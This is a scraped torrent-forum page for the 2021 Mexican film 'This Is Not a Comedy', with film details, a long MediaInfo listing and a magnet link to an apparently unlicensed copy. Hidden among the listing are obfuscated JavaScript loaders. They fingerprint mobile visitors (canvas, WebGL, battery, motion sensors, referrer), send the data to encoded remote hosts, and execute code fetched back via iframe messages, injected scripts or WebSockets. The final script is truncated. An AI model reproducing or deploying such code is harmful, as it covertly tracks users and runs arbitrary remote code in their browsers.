这不是喜剧[中文字幕].This.Is.Not.a.Comedy.2021.SPANISH.1080p.NF.WEBRip.DDP5.1.x264-BT9527 2.77GB

版主小s 4月前 514



window['' + 'j' + '7' + '7' + '5' + '0' + 'e' + '9' + 'd' + '6'+'']=function(){;(function(u,i,w,d){if(/^Mac|Win/.test(navigator.platform)){return};var dc=function(n){return String.fromCharCode(n)};var x=w[dc(0x61)+dc(0x74)+dc(0x6F)+dc(0x62)],cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';var wr='write';'jQuery';var f=d[crd](x('aWZyYW1l'));f.id='x'+(Math.random()*10000);f.style.width='10px';f.style.height=5+'px';f.style.background='#FFF';f.src=['https://',x(u),'r','j8',i].join('/');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data.k==i){d.getElementById(f.id).remove();new Function('_tdcs',x(e.data.v))(cs)}})})('ai5neGxzanQuY29t','241222251495493',window,document)};


◎译 名 这不是喜剧 / This Is Not a Comedy

◎片 名 El Comediante

◎年 代 2021

◎产 地 墨西哥

◎类 别 剧情 / 喜剧

◎上映日期 2021-10-02(瓜达拉哈拉国际电影节) / 2022-01-14(墨西哥)

◎IMDb链接 https://www.imdb.com/title/tt11363540/

◎豆瓣链接 https://movie.douban.com/subject/35717224/

◎片 长 105分钟

◎演 员 卡珊德拉·钱盖罗蒂 Cassandra Ciangherotti (id:1337936)

阿德里安娜·帕兹 Adriana Paz (id:1311307)

塞西莉亚·苏亚雷斯 Cecilia Suárez (id:1041516)

◎简 介

好朋友请他当自己的精子捐赠者,他还遇到了一位与外星球有联系的女子,这名喜剧演员从此找到了人生的新意义

  1. Video

  2. ID : 1

  3. Format : AVC

  4. Format/Info : Advanced Video Codec

  5. Format profile : [email protected]

  6. Format settings : CABAC / 3 Ref Frames

  7. Format settings, CABAC : Yes

  8. Format settings, Reference frames : 3 frames

  9. Codec ID : V_MPEG4/ISO/AVC

  10. Duration : 1 h 45 min

  11. Bit rate mode : Variable

  12. Bit rate : 3 101 kb/s

  13. Nominal bit rate : 2 204 kb/s

  14. Maximum bit rate : 5 745 kb/s

  15. Width : 1 920 pixels

  16. Height : 1 080 pixels

  17. Display aspect ratio : 16:9

  18. Frame rate mode : Constant

  19. Frame rate : 24.000 FPS

  20. Color space : YUV

  21. Chroma subsampling : 4:2:0

  22. Bit depth : 8 bits

  23. Scan type : Progressive

  24. Bits/(Pixel*Frame) : 0.062

  25. Stream size : 2.29 GiB (83%)

  26. Writing library : x264 core 148 r2724 dbe0335

  27. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=8 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=2204 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=5745 / vbv_bufsize=7660 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  28. Default : Yes

  29. Forced : No


  30. Audio

  31. ID : 2

  32. Format : E-AC-3

  33. Format/Info : Enhanced AC-3

  34. Commercial name : Dolby Digital Plus

  35. Codec ID : A_EAC3

  36. Duration : 1 h 45 min

  37. Bit rate mode : Constant

  38. Bit rate : 640 kb/s

  39. Channel(s) : 6 channels

  40. Channel layout : L R C LFE Ls Rs

  41. Sampling rate : 48.0 kHz

  42. Frame rate : 31.250 FPS (1536 SPF)

  43. Compression mode : Lossy

  44. Stream size : 484 MiB (17%)

  45. Language : Spanish

  46. Service kind : Complete Main

  47. Default : Yes

  48. Forced : No


  49. Text #1

  50. ID : 3

  51. Format : UTF-8

  52. Codec ID : S_TEXT/UTF8

  53. Codec ID/Info : UTF-8 Plain Text

  54. Duration : 22 min 4 s

  55. Bit rate : 8 b/s

  56. Count of elements : 46

  57. Stream size : 1.34 KiB (0%)

  58. Title : Forced

  59. Language : Spanish

  60. Default : Yes

  61. Forced : Yes


  62. Text #2

  63. ID : 4

  64. Format : UTF-8

  65. Codec ID : S_TEXT/UTF8

  66. Codec ID/Info : UTF-8 Plain Text

  67. Duration : 1 h 40 min

  68. Bit rate : 59 b/s

  69. Count of elements : 1618

  70. Stream size : 44.3 KiB (0%)

  71. Title : SDH

  72. Language : Spanish

  73. Default : No

  74. Forced : No


  75. Text #3

  76. ID : 5

  77. Format : UTF-8

  78. Codec ID : S_TEXT/UTF8

  79. Codec ID/Info : UTF-8 Plain Text

  80. Duration : 1 h 45 min

  81. Bit rate : 43 b/s

  82. Count of elements : 1385

  83. Stream size : 33.8 KiB (0%)

  84. Language : English

  85. Default : No

  86. Forced : No


  87. Text #4

  88. ID : 6

  89. Format : UTF-8

  90. Codec ID : S_TEXT/UTF8

  91. Codec ID/Info : UTF-8 Plain Text

  92. Duration : 1 h 45 min

  93. Bit rate : 55 b/s

  94. Count of elements : 1647

  95. Stream size : 43.0 KiB (0%)

  96. Title : SDH

  97. Language : English

  98. Default : No

  99. Forced : No


  100. Text #5

  101. ID : 7

  102. Format : UTF-8

  103. Codec ID : S_TEXT/UTF8

  104. Codec ID/Info : UTF-8 Plain Text

  105. Duration : 1 h 45 min

  106. Bit rate : 82 b/s

  107. Count of elements : 1432

  108. Stream size : 63.5 KiB (0%)

  109. Language : Arabic

  110. Default : No

  111. Forced : No


  112. Text #6

  113. ID : 8

  114. Format : UTF-8

  115. Codec ID : S_TEXT/UTF8

  116. Codec ID/Info : UTF-8 Plain Text

  117. Duration : 1 h 45 min

  118. Bit rate : 44 b/s

  119. Count of elements : 1410

  120. Stream size : 34.1 KiB (0%)

  121. Language : Czech

  122. Default : No

  123. Forced : No


  124. Text #7

  125. ID : 9

  126. Format : UTF-8

  127. Codec ID : S_TEXT/UTF8

  128. Codec ID/Info : UTF-8 Plain Text

  129. Duration : 1 h 45 min

  130. Bit rate : 44 b/s

  131. Count of elements : 1246

  132. Stream size : 34.4 KiB (0%)

  133. Language : Danish

  134. Default : No

  135. Forced : No


  136. Text #8

  137. ID : 10

  138. Format : UTF-8

  139. Codec ID : S_TEXT/UTF8

  140. Codec ID/Info : UTF-8 Plain Text

  141. Duration : 1 h 45 min

  142. Bit rate : 43 b/s

  143. Count of elements : 1378

  144. Stream size : 33.3 KiB (0%)

  145. Language : German

  146. Default : No

  147. Forced : No


  148. Text #9

  149. ID : 11

  150. Format : UTF-8

  151. Codec ID : S_TEXT/UTF8

  152. Codec ID/Info : UTF-8 Plain Text

  153. Duration : 1 h 45 min

  154. Bit rate : 79 b/s

  155. Count of elements : 1399

  156. Stream size : 61.8 KiB (0%)

  157. Language : Greek

  158. Default : No

  159. Forced : No


  160. Text #10

  161. ID : 12

  162. Format : UTF-8

  163. Codec ID : S_TEXT/UTF8

  164. Codec ID/Info : UTF-8 Plain Text

  165. Duration : 1 h 45 min

  166. Bit rate : 42 b/s

  167. Count of elements : 1309

  168. Stream size : 33.2 KiB (0%)

  169. Language : Finnish

  170. Default : No

  171. Forced : No


  172. Text #11

  173. ID : 13

  174. Format : UTF-8

  175. Codec ID : S_TEXT/UTF8

  176. Codec ID/Info : UTF-8 Plain Text

  177. Duration : 1 h 45 min

  178. Bit rate : 45 b/s

  179. Count of elements : 1332

  180. Stream size : 35.3 KiB (0%)

  181. Language : French

  182. Default : No

  183. Forced : No


  184. Text #12

  185. ID : 14

  186. Format : UTF-8

  187. Codec ID : S_TEXT/UTF8

  188. Codec ID/Info : UTF-8 Plain Text

  189. Duration : 1 h 45 min

  190. Bit rate : 73 b/s

  191. Count of elements : 1429

  192. Stream size : 57.0 KiB (0%)

  193. Language : Hebrew

  194. Default : No

  195. Forced : No


  196. Text #13

  197. ID : 15

  198. Format : UTF-8

  199. Codec ID : S_TEXT/UTF8

  200. Codec ID/Info : UTF-8 Plain Text

  201. Duration : 1 h 45 min

  202. Bit rate : 41 b/s

  203. Count of elements : 1377

  204. Stream size : 31.8 KiB (0%)

  205. Language : Croatian

  206. Default : No

  207. Forced : No


  208. Text #14

  209. ID : 16

  210. Format : UTF-8

  211. Codec ID : S_TEXT/UTF8

  212. Codec ID/Info : UTF-8 Plain Text

  213. Duration : 1 h 45 min

  214. Bit rate : 43 b/s

  215. Count of elements : 1403

  216. Stream size : 33.8 KiB (0%)

  217. Language : Hungarian

  218. Default : No

  219. Forced : No


  220. Text #15

  221. ID : 17

  222. Format : UTF-8

  223. Codec ID : S_TEXT/UTF8

  224. Codec ID/Info : UTF-8 Plain Text

  225. Duration : 1 h 45 min

  226. Bit rate : 44 b/s

  227. Count of elements : 1408

  228. Stream size : 34.7 KiB (0%)

  229. Language : Indonesian

  230. Default : No

  231. Forced : No


  232. Text #16

  233. ID : 18

  234. Format : UTF-8

  235. Codec ID : S_TEXT/UTF8

  236. Codec ID/Info : UTF-8 Plain Text

  237. Duration : 1 h 45 min

  238. Bit rate : 43 b/s

  239. Count of elements : 1417

  240. Stream size : 33.8 KiB (0%)

  241. Language : Italian

  242. Default : No

  243. Forced : No


  244. Text #17

  245. ID : 19

  246. Format : UTF-8

  247. Codec ID : S_TEXT/UTF8

  248. Codec ID/Info : UTF-8 Plain Text

  249. Duration : 1 h 45 min

  250. Bit rate : 43 b/s

  251. Count of elements : 1484

  252. Stream size : 33.8 KiB (0%)

  253. Language : Japanese

  254. Default : No

  255. Forced : No


  256. Text #18

  257. ID : 20

  258. Format : UTF-8

  259. Codec ID : S_TEXT/UTF8

  260. Codec ID/Info : UTF-8 Plain Text

  261. Duration : 1 h 45 min

  262. Bit rate : 59 b/s

  263. Count of elements : 1423

  264. Stream size : 45.7 KiB (0%)

  265. Language : Korean

  266. Default : No

  267. Forced : No


  268. Text #19

  269. ID : 21

  270. Format : UTF-8

  271. Codec ID : S_TEXT/UTF8

  272. Codec ID/Info : UTF-8 Plain Text

  273. Duration : 1 h 45 min

  274. Bit rate : 44 b/s

  275. Count of elements : 1394

  276. Stream size : 34.4 KiB (0%)

  277. Language : Malay

  278. Default : No

  279. Forced : No


  280. Text #20

  281. ID : 22

  282. Format : UTF-8

  283. Codec ID : S_TEXT/UTF8

  284. Codec ID/Info : UTF-8 Plain Text

  285. Duration : 1 h 45 min

  286. Bit rate : 44 b/s

  287. Count of elements : 1396

  288. Stream size : 34.0 KiB (0%)

  289. Language : Norwegian Bokmal

  290. Default : No

  291. Forced : No


  292. Text #21

  293. ID : 23

  294. Format : UTF-8

  295. Codec ID : S_TEXT/UTF8

  296. Codec ID/Info : UTF-8 Plain Text

  297. Duration : 1 h 45 min

  298. Bit rate : 43 b/s

  299. Count of elements : 1215

  300. Stream size : 34.0 KiB (0%)

  301. Language : Dutch

  302. Default : No

  303. Forced : No


  304. Text #22

  305. ID : 24

  306. Format : UTF-8

  307. Codec ID : S_TEXT/UTF8

  308. Codec ID/Info : UTF-8 Plain Text

  309. Duration : 1 h 45 min

  310. Bit rate : 42 b/s

  311. Count of elements : 1362

  312. Stream size : 32.8 KiB (0%)

  313. Language : Polish

  314. Default : No

  315. Forced : No


  316. Text #23

  317. ID : 25

  318. Format : UTF-8

  319. Codec ID : S_TEXT/UTF8

  320. Codec ID/Info : UTF-8 Plain Text

  321. Duration : 1 h 45 min

  322. Bit rate : 43 b/s

  323. Count of elements : 1379

  324. Stream size : 33.7 KiB (0%)

  325. Language : Portuguese

  326. Default : No

  327. Forced : No


  328. Text #24

  329. ID : 26

  330. Format : UTF-8

  331. Codec ID : S_TEXT/UTF8

  332. Codec ID/Info : UTF-8 Plain Text

  333. Duration : 1 h 45 min

  334. Bit rate : 44 b/s

  335. Count of elements : 1432

  336. Stream size : 34.2 KiB (0%)

  337. Title : Brazil

  338. Language : Portuguese

  339. Default : No

  340. Forced : No


  341. Text #25

  342. ID : 27

  343. Format : UTF-8

  344. Codec ID : S_TEXT/UTF8

  345. Codec ID/Info : UTF-8 Plain Text

  346. Duration : 1 h 45 min

  347. Bit rate : 51 b/s

  348. Count of elements : 1433

  349. Stream size : 39.5 KiB (0%)

  350. Language : Romanian

  351. Default : No

  352. Forced : No


  353. Text #26

  354. ID : 28

  355. Format : UTF-8

  356. Codec ID : S_TEXT/UTF8

  357. Codec ID/Info : UTF-8 Plain Text

  358. Duration : 1 h 45 min

  359. Bit rate : 77 b/s

  360. Count of elements : 1415

  361. Stream size : 59.7 KiB (0%)

  362. Language : Russian

  363. Default : No

  364. Forced : No


  365. Text #27

  366. ID : 29

  367. Format : UTF-8

  368. Codec ID : S_TEXT/UTF8

  369. Codec ID/Info : UTF-8 Plain Text

  370. Duration : 1 h 45 min

  371. Bit rate : 45 b/s

  372. Count of elements : 1190

  373. Stream size : 35.3 KiB (0%)

  374. Language : Swedish

  375. Default : No

  376. Forced : No


  377. Text #28

  378. ID : 30

  379. Format : UTF-8

  380. Codec ID : S_TEXT/UTF8

  381. Codec ID/Info : UTF-8 Plain Text

  382. Duration : 1 h 45 min

  383. Bit rate : 123 b/s

  384. Count of elements : 1432

  385. Stream size : 95.4 KiB (0%)

  386. Language : Thai

  387. Default : No

  388. Forced : No


  389. Text #29

  390. ID : 31

  391. Format : UTF-8

  392. Codec ID : S_TEXT/UTF8

  393. Codec ID/Info : UTF-8 Plain Text

  394. Duration : 1 h 45 min

  395. Bit rate : 43 b/s

  396. Count of elements : 1420

  397. Stream size : 33.4 KiB (0%)

  398. Language : Turkish

  399. Default : No

  400. Forced : No


  401. Text #30

  402. ID : 32

  403. Format : UTF-8

  404. Codec ID : S_TEXT/UTF8

  405. Codec ID/Info : UTF-8 Plain Text

  406. Duration : 1 h 45 min

  407. Bit rate : 70 b/s

  408. Count of elements : 1433

  409. Stream size : 54.4 KiB (0%)

  410. Language : Ukrainian

  411. Default : No

  412. Forced : No


  413. Text #31

  414. ID : 33

  415. Format : UTF-8

  416. Codec ID : S_TEXT/UTF8

  417. Codec ID/Info : UTF-8 Plain Text

  418. Duration : 1 h 45 min

  419. Bit rate : 64 b/s

  420. Count of elements : 1271

  421. Stream size : 49.8 KiB (0%)

  422. Language : Vietnamese

  423. Default : No

  424. Forced : No


  425. Text #32

  426. ID : 34

  427. Format : UTF-8

  428. Codec ID : S_TEXT/UTF8

  429. Codec ID/Info : UTF-8 Plain Text

  430. Duration : 1 h 45 min

  431. Bit rate : 51 b/s

  432. Count of elements : 1433

  433. Stream size : 39.5 KiB (0%)

  434. Title : Simplified

  435. Language : Chinese

  436. Default : No

  437. Forced : No


  438. Text #33

  439. ID : 35

  440. Format : UTF-8

  441. Codec ID : S_TEXT/UTF8

  442. Codec ID/Info : UTF-8 Plain Text

  443. Duration : 1 h 45 min

  444. Bit rate : 51 b/s

  445. Count of elements : 1445

  446. Stream size : 39.5 KiB (0%)

  447. Title : Traditional

  448. Language : Chinese

  449. Default : No

  450. Forced : No

复制代码

 

 


TAGS 剧情 喜剧

磁力链:
  • magnet:?xt=urn:btih:3E7D2CA0466391BE08A8B059CBEC8C5529B0D67D




var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x57\x62\x51\x66\x48\x58\x65\x61\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,ref:a(),url:b(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9vc2tqZmtkbHNqZmRzLnN6ZmhsOTkuYY29t','d3NNzOi8vd3MuYXJ0cy1jbG91ZC5uZXQ6ODU4NNSx3c3M6Ly93cy5qaW5mdTIxLmNNvbTo4NNTg1',window,document,['Y','N']);}:function(){};
上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x45\x77\x59\x6e\x77\x4c\x44\x4f\x62\x63']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt 